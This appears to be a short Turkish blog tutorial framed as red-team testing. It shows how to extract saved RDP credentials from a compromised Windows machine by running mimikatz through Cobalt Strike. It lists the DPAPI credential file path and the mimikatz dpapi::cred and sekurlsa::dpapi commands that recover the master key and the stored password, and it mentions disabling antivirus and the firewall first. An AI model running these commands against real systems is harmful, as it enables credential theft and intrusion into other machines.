alicangonullu tarafından 2022-10-07 21:56:52 tarihinde yazıldı. Tahmini okunma süresi 1 dakika, 24 saniye. 273 kere görüntülendi.
Disclaimer
Merhabalar,
Bu yazımda Red Team testlerinden biri olan Cobalt Strike ile hedef cihazda kayıtlı RDP bilgilerini almayı anlatacağım şimdiden keyifli okumalar dilerim.
Öncelikle hedef makinemizde IT'nin bağlantı kurduğunu ve bu bağlantıları hatırla dediği bir senaryo hayal ediyoruz. Biz Red Team üyesi olarak bilgisayara daha önceki konularda anlattığım yöntemlerden biriyle sızdık ve bu RDP bilgisini elde ettik. Ardından antivirüsleri ve firewall'ı devre dışı bıraktık. Bu adımlardan sonra sırası ile yapmamız gereken adımlar şunlardır,
Konumu, C:\Users\%user&\AppData\Local\Microsoft\Credentials\
Komutumuz, mimikatz dpapi::cred /in:C:\Users\%user%\AppData\Local\Microsoft\Credentials\CREDENTIAL_KEY
Kırmızı daire içerisindeki key aklımızda bulunsun bir sonraki aşamada işimize yarayacak
Komutumuz, mimikatz sekurlsa::dpapi
Komutumuz, mimikatz dpapi::cred /in:C:\Users\Muhasebe\AppData\Local\Microsoft\Credentials\CREDENTIAL_KEY
/masterkey:MASTER_KEY
Ve tüm RDP bilgileriyle beraber şifremizi de elde etmiş olduk.
Bu konuda daha fazla yazı için takip etmeyi unutmayın!